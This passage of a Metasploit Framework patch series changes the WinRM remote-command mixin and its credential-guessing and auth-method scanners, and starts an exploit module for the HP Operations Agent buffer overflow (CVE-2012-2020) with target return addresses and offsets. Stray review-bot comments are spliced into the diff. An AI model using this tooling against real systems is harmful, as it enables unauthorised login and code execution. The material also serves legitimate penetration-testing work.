 1 file changed, 401 insertions(+), 401 deletions(-)
diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb
index ff4e6e5e30..3e96261348 100644
--- a/lib/msf/core/exploit/winrm.rb
+++ b/lib/msf/core/exploit/winrm.rb
@@ -6,418 +6,418 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' module Msf - module Exploit::Remote::WinRM - include Exploit::Remote::NTLM::Client - include Exploit::Remote::HttpClient - # - # Constants - # - NTLM_CRYPT ||= Rex::Proto::NTLM::Crypt - NTLM_CONST ||= Rex::Proto::NTLM::Constants - NTLM_UTILS ||= Rex::Proto::NTLM::Utils - NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions - def initialize(info = {}) - super - register_options( - [ - Opt::RPORT(5985), - OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']), - OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]), - OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]), - OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ]), - ], self.class - ) +module Exploit::Remote::WinRM + include Exploit::Remote::NTLM::Client + include Exploit::Remote::HttpClient + # + # Constants + # + NTLM_CRYPT ||= Rex::Proto::NTLM::Crypt + NTLM_CONST ||= Rex::Proto::NTLM::Constants + NTLM_UTILS ||= Rex::Proto::NTLM::Utils + NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions + def initialize(info = {}) + super + register_options( + [ + Opt::RPORT(5985), + OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']), + OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]), + OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]), + OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ]), + ], self.class + ) - register_autofilter_ports([ 80,443,5985,5986 ]) - register_autofilter_services(%W{ winrm }) + register_autofilter_ports([ 80,443,5985,5986 ]) + register_autofilter_services(%W{ winrm }) + end + + def winrm_poke(timeout = 20) + opts = { + 'uri' => datastore['URI'], + 'data' => Rex::Text.rand_text_alpha(8) + } + c = connect(opts) + to = opts[:timeout] || timeout + 
ctype = "application/soap+xml;charset=UTF-8" + resp, c = send_request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'POST', + 'ctype' => ctype, + 'data' => opts['data'] + }), to) + return resp + end + + def parse_auth_methods(resp) + return [] unless resp and resp.code == 401 + methods = [] + methods << "Negotiate" if resp.headers['WWW-Authenticate'].include? "Negotiate" + methods << "Kerberos" if resp.headers['WWW-Authenticate'].include? "Kerberos" + methods << "Basic" if resp.headers['WWW-Authenticate'].include? "Basic" + return methods + end + + def winrm_run_cmd(cmd, timeout=20) + resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + if resp.code == 401 + print_error "Login failure! Recheck supplied credentials." + return resp .code end + unless resp.code == 200 + print_error "Got unexpected response: \n #{resp.to_s}" + retval == resp.code || 0 + return retval + end + shell_id = winrm_get_shell_id(resp) + resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + cmd_id = winrm_get_cmd_id(resp) + resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + streams = winrm_get_cmd_streams(resp) + resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) + resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) + return streams + end - def winrm_poke(timeout = 20) - opts = { - 'uri' => datastore['URI'], - 'data' => Rex::Text.rand_text_alpha(8) - } + def winrm_wql_msg(wql) + action = winrm_uri_action("wql") + contents = winrm_header(action) + winrm_wql_body(wql) + msg = winrm_envelope(contents) + return msg + end + + def winrm_open_shell_msg + action = winrm_uri_action("create_shell") + options = winrm_option_set([['WINRS_NOPROFILE', 'FALSE'], ['WINRS_CODEPAGE', '437']]) + header_data = action + options + contents = winrm_header(header_data) + winrm_open_shell_body + msg = winrm_envelope(contents) + return msg + end + + def winrm_cmd_msg(cmd,shell_id) + action = winrm_uri_action("send_cmd") + options = 
winrm_option_set([['WINRS_CONSOLEMODE_STDIN', 'TRUE'], ['WINRS_SKIP_CMD_SHELL', 'FALSE']]) + selectors = winrm_selector_set([['ShellId', shell_id]]) + header_data = action + options + selectors + contents = winrm_header(header_data) + winrm_cmd_body(cmd) + msg = winrm_envelope(contents) + return msg + end + + def winrm_cmd_recv_msg(shell_id,cmd_id) + action = winrm_uri_action("recv_cmd") + selectors = winrm_selector_set([['ShellId', shell_id]]) + header_data = action + selectors + contents = winrm_header(header_data) + winrm_cmd_recv_body(cmd_id) + msg = winrm_envelope(contents) + return msg + end + + def winrm_terminate_cmd_msg(shell_id,cmd_id) + action = winrm_uri_action("signal_shell") + selectors = winrm_selector_set([['ShellId', shell_id]]) + header_data = action + selectors + contents = winrm_header(header_data) + winrm_terminate_cmd_body(cmd_id) + msg = winrm_envelope(contents) + return msg + end + + def winrm_delete_shell_msg(shell_id) + action = winrm_uri_action("delete_shell") + selectors = winrm_selector_set([['ShellId', shell_id]]) + header_data = action + selectors + contents = winrm_header(header_data) + winrm_empty_body + msg = winrm_envelope(contents) + return msg + end + + def parse_wql_response(response) + xml = response.body + columns = [] + rows =[] + rxml = REXML::Document.new(xml).root + items = rxml.elements["///w:Items"] + items.elements.to_a("///w:XmlFragment").each do |node| + row_data = [] + node.elements.to_a.each do |sub_node| + columns << sub_node.name + row_data << sub_node.text + end + rows << row_data + end + columns.uniq! 
+ response_data = Rex::Ui::Text::Table.new( + 'Header' => "#{datastore['WQL']} (#{rhost})", + 'Indent' => 1, + 'Columns' => columns + ) + rows.each do |row| + response_data << row + end + return response_data + end + + def winrm_get_shell_id(response) + xml = response.body + shell_id = REXML::Document.new(xml).elements["//w:Selector"].text + end + + def winrm_get_cmd_id(response) + xml = response.body + cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text + end + + def winrm_get_cmd_streams(response) + streams = { + 'stdout' => '', + 'stderr' => '', + } + xml = response.body + rxml = REXML::Document.new(xml).root + rxml.elements.to_a("//rsp:Stream").each do |node| + next if node.text.nil? + streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text) + end + return streams + end + + def generate_uuid + ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) + end + + def send_request_ntlm(data, timeout = 20) + opts = { + 'uri' => datastore['URI'], + 'data' => data, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + ntlm_options = { + :signing => false, + :usentlm2_session => datastore['NTLM::UseNTLM2_session'], + :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], + :send_lm => datastore['NTLM::SendLM'], + :send_ntlm => datastore['NTLM::SendNTLM'] + } + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = datastore['DOMAIN'] + ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, + workstation_name, + ntlmssp_flags)) + to = opts[:timeout] || timeout + begin c = connect(opts) - to = opts[:timeout] || timeout ctype = "application/soap+xml;charset=UTF-8" - resp, c = send_request_cgi(opts.merge({ + # First request to get the challenge + r = c.request_cgi(opts.merge({ 'uri' => opts['uri'], 'method' => 'POST', 'ctype' => ctype, + 'headers' => { 'Authorization' => ntlm_message_1}, 'data' 
=> opts['data'] - }), to) - return resp - end - - def parse_auth_methods(resp) - return [] unless resp and resp.code == 401 - methods = [] - methods << "Negotiate" if resp.headers['WWW-Authenticate'].include? "Negotiate" - methods << "Kerberos" if resp.headers['WWW-Authenticate'].include? "Kerberos" - methods << "Basic" if resp.headers['WWW-Authenticate'].include? "Basic" - return methods - end - - def winrm_run_cmd(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) - if resp.code == 401 - print_error "Login failure! Recheck supplied credentials." - return resp .code + })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] end - unless resp.code == 200 - print_error "Got unexpected response: \n #{resp.to_s}" - retval == resp.code || 0 - return retval + return [nil,nil] if resp.code == 404 + return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] + return [nil,nil] unless ntlm_challenge + + #old and simplier method but not compatible with windows 7/2008r2 + #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) + #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + #netbios name + default_name = blob_data[:default_name] || '' + #netbios domain + default_domain = blob_data[:default_domain] || '' + #dns name + dns_host_name = blob_data[:dns_host_name] || '' + #dns domain + dns_domain_name = blob_data[:dns_domain_name] || '' + #Client time + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' + 
spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + resp_lm, + resp_ntlm, + client_challenge, + ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, + domain_name, default_name, default_domain, + dns_host_name, dns_domain_name, chall_MsvAvTimestamp, + spnopt, ntlm_options) + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], + resp_lm, resp_ntlm, '', ntlmssp_flags) + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + # Send the response + r = c.request_cgi(opts.merge({ + 'uri' => opts['uri'], + 'method' => 'POST', + 'ctype' => ctype, + 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, + 'data' => opts['data'] + })) + resp = c.send_recv(r, to, true) + unless resp.kind_of? Rex::Proto::Http::Response + return [nil,nil] end - shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) - cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) - streams = winrm_get_cmd_streams(resp) - resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) - resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) - return streams + return [nil,nil] if resp.code == 404 + return [resp,c] + rescue ::Errno::EPIPE, ::Timeout::Error end - - def winrm_wql_msg(wql) - action = winrm_uri_action("wql") - contents = winrm_header(action) + winrm_wql_body(wql) - msg = winrm_envelope(contents) - return msg - end - - def winrm_open_shell_msg - action = winrm_uri_action("create_shell") - options = winrm_option_set([['WINRS_NOPROFILE', 'FALSE'], ['WINRS_CODEPAGE', '437']]) - header_data = action + options - contents = winrm_header(header_data) + winrm_open_shell_body - msg = winrm_envelope(contents) - return msg - end - - def winrm_cmd_msg(cmd,shell_id) - action = winrm_uri_action("send_cmd") - options = 
winrm_option_set([['WINRS_CONSOLEMODE_STDIN', 'TRUE'], ['WINRS_SKIP_CMD_SHELL', 'FALSE']]) - selectors = winrm_selector_set([['ShellId', shell_id]]) - header_data = action + options + selectors - contents = winrm_header(header_data) + winrm_cmd_body(cmd) - msg = winrm_envelope(contents) - return msg - end - - def winrm_cmd_recv_msg(shell_id,cmd_id) - action = winrm_uri_action("recv_cmd") - selectors = winrm_selector_set([['ShellId', shell_id]]) - header_data = action + selectors - contents = winrm_header(header_data) + winrm_cmd_recv_body(cmd_id) - msg = winrm_envelope(contents) - return msg - end - - def winrm_terminate_cmd_msg(shell_id,cmd_id) - action = winrm_uri_action("signal_shell") - selectors = winrm_selector_set([['ShellId', shell_id]]) - header_data = action + selectors - contents = winrm_header(header_data) + winrm_terminate_cmd_body(cmd_id) - msg = winrm_envelope(contents) - return msg - end - - def winrm_delete_shell_msg(shell_id) - action = winrm_uri_action("delete_shell") - selectors = winrm_selector_set([['ShellId', shell_id]]) - header_data = action + selectors - contents = winrm_header(header_data) + winrm_empty_body - msg = winrm_envelope(contents) - return msg - end - - def parse_wql_response(response) - xml = response.body - columns = [] - rows =[] - rxml = REXML::Document.new(xml).root - items = rxml.elements["///w:Items"] - items.elements.to_a("///w:XmlFragment").each do |node| - row_data = [] - node.elements.to_a.each do |sub_node| - columns << sub_node.name - row_data << sub_node.text - end - rows << row_data - end - columns.uniq! 
- response_data = Rex::Ui::Text::Table.new( - 'Header' => "#{datastore['WQL']} (#{rhost})", - 'Indent' => 1, - 'Columns' => columns - ) - rows.each do |row| - response_data << row - end - return response_data - end - - def winrm_get_shell_id(response) - xml = response.body - shell_id = REXML::Document.new(xml).elements["//w:Selector"].text - end - - def winrm_get_cmd_id(response) - xml = response.body - cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text - end - - def winrm_get_cmd_streams(response) - streams = { - 'stdout' => '', - 'stderr' => '', - } - xml = response.body - rxml = REXML::Document.new(xml).root - rxml.elements.to_a("//rsp:Stream").each do |node| - next if node.text.nil? - streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text) - end - return streams - end - - def generate_uuid - ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) - end - - def send_request_ntlm(data, timeout = 20) - opts = { - 'uri' => datastore['URI'], - 'data' => data, - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - } - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - ctype = "application/soap+xml;charset=UTF-8" - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => ntlm_message_1}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to) - unless 
resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, - 'data' => opts['data'] - 
})) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - def accepts_ntlm_auth - parse_auth_methods(winrm_poke).include? "Negotiate" - end - - def target_url - proto = "http" - if rport == 5986 or datastore['SSL'] - proto = "https" - end - if datastore['VHOST'] - return "#{proto}://#{datastore ['VHOST']}:#{rport}#{@uri.to_s}" - else - return "#{proto}://#{rhost}:#{rport}#{@uri.to_s}" - end - end - - private - - def winrm_option_set(options) - xml = "" - options.each do |option_pair| - xml << winrm_option(*option_pair) - end - xml << "" - return xml - end - - def winrm_option(name,value) - %Q{#{value}} - end - - def winrm_selector_set(selectors) - xml = "" - selectors.each do |selector_pair| - xml << winrm_selector(*selector_pair) - end - xml << "" - return xml - end - - def winrm_selector(name,value) - %Q{#{value}} - end - - def winrm_wql_body(wql) - %Q{ - - - - 32000 - #{wql} - - - } - end - - def winrm_open_shell_body - %q{ - - stdin - stdout stderr - - } - end - - def winrm_cmd_body(cmd) - %Q{ - - "#{cmd}" - - } - end - - def winrm_cmd_recv_body(cmd_id) - %Q{ - - stdout stderr - - } - end - - def winrm_terminate_cmd_body(cmd_id) - %Q{ - - http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate - - } - end - - def winrm_empty_body - %q{} - end - - def winrm_envelope(data) - %Q{ - - #{data} - } - end - - def winrm_header(data) - %Q{ - - #{target_url} - - http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous - - 153600 - uuid:#{generate_uuid} - - - PT60S - #{data} - - } - end - - def winrm_uri_action(type) - case type - when "wql" - return %q{http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/* - http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate} - when "create_shell" - return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd - 
http://schemas.xmlsoap.org/ws/2004/09/transfer/Create} - when "send_cmd" - return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd - http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command} - when "recv_cmd" - return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd - http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive} - when "signal_shell" - return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd - http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal} - when "delete_shell" - return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd - http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete} - end - end - end + + def accepts_ntlm_auth + parse_auth_methods(winrm_poke).include? "Negotiate" + end + + def target_url + proto = "http" + if rport == 5986 or datastore['SSL'] + proto = "https" + end + if datastore['VHOST'] + return "#{proto}://#{datastore ['VHOST']}:#{rport}#{@uri.to_s}" + else + return "#{proto}://#{rhost}:#{rport}#{@uri.to_s}" + end + end + + private + + def winrm_option_set(options) + xml = "" + options.each do |option_pair| + xml << winrm_option(*option_pair) + end + xml << "" + return xml + end + + def winrm_option(name,value) + %Q{#{value}} + end + + def winrm_selector_set(selectors) + xml = "" + selectors.each do |selector_pair| + xml << winrm_selector(*selector_pair) + end + xml << "" + return xml + end + + def winrm_selector(name,value) + %Q{#{value}} + end + + def winrm_wql_body(wql) + %Q{ + + + + 32000 + #{wql} + + + } + end + + def winrm_open_shell_body + %q{ + + stdin + stdout stderr + + } + end + + def winrm_cmd_body(cmd) + %Q{ + + "#{cmd}" + + } + end + + def winrm_cmd_recv_body(cmd_id) + %Q{ + + stdout stderr + + } + end + + def winrm_terminate_cmd_body(cmd_id) + %Q{ + + http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate + + } + end + + def winrm_empty_body + %q{} + end + + def winrm_envelope(data) + %Q{ + + #{data} + } + end + + def 
winrm_header(data) + %Q{ + + #{target_url} + + http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous + + 153600 + uuid:#{generate_uuid} + + + PT60S + #{data} + + } + end + + def winrm_uri_action(type) + case type + when "wql" + return %q{http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/* + http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate} + when "create_shell" + return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd + http://schemas.xmlsoap.org/ws/2004/09/transfer/Create} + when "send_cmd" + return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd + http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command} + when "recv_cmd" + return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd + http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive} + when "signal_shell" + return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd + http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal} + when "delete_shell" + return %q{http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd + http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete} + end + end + +end end From fb7af536d5f66d3f4d4cbed25e66faa8944877f9 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 25 Oct 2012 10:16:12 -0500 Subject: [PATCH 55/74] wtf, bad metadata Removed extraneous references section --- modules/auxiliary/scanner/winrm/winrm_login.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index ca9c8c74af..34a16f8682 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -30,10 +30,6 @@ class Metasploit3 < Msf::Auxiliary works only if the remote end allows Negotiate(NTLM) authentication. Kerberos is not currently supported. }, - 'References' => - [ - - ], 'Author' => [ 'thelightcosine' ], 'References' => [ 
From b15c38f81969a6774462668f44fea29158e72a88 Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Thu, 25 Oct 2012 19:57:29 -0500
Subject: [PATCH 56/74] Fix output to display ip:port
---
 modules/auxiliary/scanner/winrm/winrm_auth_methods.rb | 6 +++---
 modules/auxiliary/scanner/winrm/winrm_login.rb | 6 +++---
 2 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb
index 910fe06ff2..d0b583a549 100644
--- a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb
@@ -52,9 +52,9 @@ class Metasploit3 < Msf::Auxiliary
 :name => 'winrm',
 :info => desc
 )
- print_good "Negotiate protocol supported" if methods.include? "Negotiate"
- print_good "Kerberos protocol supported" if methods.include? "Kerberos"
- print_good "Basic protocol supported" if methods.include? "Basic"
+ print_good "#{ip}:#{rport}: Negotiate protocol supported" if methods.include? "Negotiate"
+ print_good "#{ip}:#{rport}: Kerberos protocol supported" if methods.include? "Kerberos"
+ print_good "#{ip}:#{rport}: Basic protocol supported" if methods.include? "Basic"
 else
 print_error "#{ip}:#{rport} Does not appear to be a WinRM server"
 end
diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb
index 34a16f8682..198bdd83d6 100644
--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
 each_user_pass do |user, pass|
 resp,c = send_request_ntlm(test_request)
 if resp.nil?
- print_error "Got no reply from the server, connection may have timed out"
+ print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out"
 return
 elsif resp.code == 200
 cred_hash = {
@@ -62,9 +62,9 @@ class Metasploit3 < Msf::Auxiliary
 :active => true
 }
 report_auth_info(cred_hash)
- print_good "Valid credential found: #{user}:#{pass}"
+ print_good "#{ip}:#{rport}: Valid credential found: #{user}:#{pass}"
 elsif resp.code == 401
- print_error "Login failed: #{user}:#{pass}"
+ print_error "#{ip}:#{rport}: Login failed: #{user}:#{pass}"
 else
 print_error "Recieved unexpected Response Code: #{resp.code}"
 end
From 164321a5ed455368343770ec563d410d1ea1d0bd Mon Sep 17 00:00:00 2001
From: zombieCraig
Date: Fri, 26 Oct 2012 11:56:14 -0400
Subject: [PATCH 57/74] Add Domain notes to smb_version
---
 modules/auxiliary/scanner/smb/smb_version.rb | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb
index e6b99f9dc7..fbb770395d 100644
--- a/modules/auxiliary/scanner/smb/smb_version.rb
+++ b/modules/auxiliary/scanner/smb/smb_version.rb
@@ -101,6 +101,8 @@ class Metasploit3 < Msf::Auxiliary
 conf[:os_sp] = res['sp'] if res['sp']
 conf[:os_lang] = res['lang'] if res['os'] =~ /Windows/
+ conf[:SMBName] = simple.client.default_name if simple.client.default_name
+ conf[:SMBDomain] = simple.client.default_domain if simple.client.default_domain
 report_note(
 :host => ip,
From bcb80431d6a13ea57fdde30e5da13788b74da7d7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Sat, 27 Oct 2012 22:43:16 +0200
Subject: [PATCH 58/74] Added module for CVE-2012-2020
---
 .../misc/hp_operations_agent_coda_8c.rb | 239 ++++++++++++++++++
 1 file changed, 239 insertions(+)
 create mode 100644 modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
new file mode 100644
index 0000000000..461e99b0e2
--- /dev/null
+++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
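Review bot: The `else` branch's `print_error "Recieved unexpected Response Code: #{resp.code}"` is now the only message in this loop without the `#{ip}:#{rport}:` prefix the hunk adds to the 200 and 401 branches, and it misspells "Received"; `print_error "#{ip}:#{rport}: Received unexpected Response Code: #{resp.code}"` keeps the output uniform so the lines can be attributed to a host when several are scanned. The same applies to the `print_error "#{ip}:#{rport} Does not appear to be a WinRM server"` context line in the winrm_auth_methods.rb hunk, which lacks the colon after the port that the new lines use.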
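Review bot: The two added keys `:SMBName` and `:SMBDomain` break the snake_case convention of the neighbouring `conf` entries (`:os_sp`, `:os_lang`); unless whatever consumes this `report_note` data expects those exact names (not visible from the hunk), `conf[:smb_name]` / `conf[:smb_domain]` would read consistently. Note also that the `if simple.client.default_name` guard only skips `nil`/`false`, so if the client can report an empty string (I cannot tell from here) it will be recorded as a name; `unless simple.client.default_name.to_s.empty?` would cover both.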
@@ -0,0 +1,239 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize + super( + 'Name' => 'HP Operations Agent Opcode 0x8c Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in HP Operations Agent for + Windows. The vulnerability exists in the HP Software Performance Core Program + component (coda.exe) when parsing requests for the 0x8c opcode. This module has + been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and + Windows 2003 SP2 (DEP bypass). + + The coda.exe components runs only for localhost by default, network access must be + granted through its configuration to be remotely exploitable. On the other hand it + runs on a random TCP port, to make easier reconnaissance a check function is + provided. 
+ }, + 'Author' => [ + 'Luigi Auriemma', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2012-2020' ], + [ 'OSVDB', '83674' ], + [ 'BID', '54362' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-115/' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500 + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'HP Operations Agent 11.00 / Windows XP SP3', + { + 'Ret' => 0x100e79eb, # ppr from OvSecCore.dll + 'Offset' => 2084 + } + ], + [ 'HP Operations Agent 11.00 / Windows 2003 SP2', + { + 'Ret' => 0x10073c2c, # stackpivot # ADD ESP,404 # RETN from OvSecCore.dll + 'Offset' => 2084, + 'RopOffset' => 36 + } + ] + ], + 'DefaultTarget' => 1, + 'Privileged' => true, + 'DisclosureDate' => 'Jul 09 2012' + ) + + end + + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def check + + res = ping + + if not res + return Exploit::CheckCode::Unknown + end + + if res !~ /HTTP\/1\.1 200 OK/ + return Exploit::CheckCode::Unknown + end + + if res =~ /server:.*coda 11.(\d+)/ + minor = $1.to_i + if minor < 2 + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + if res =~ /server:.*coda/ + return 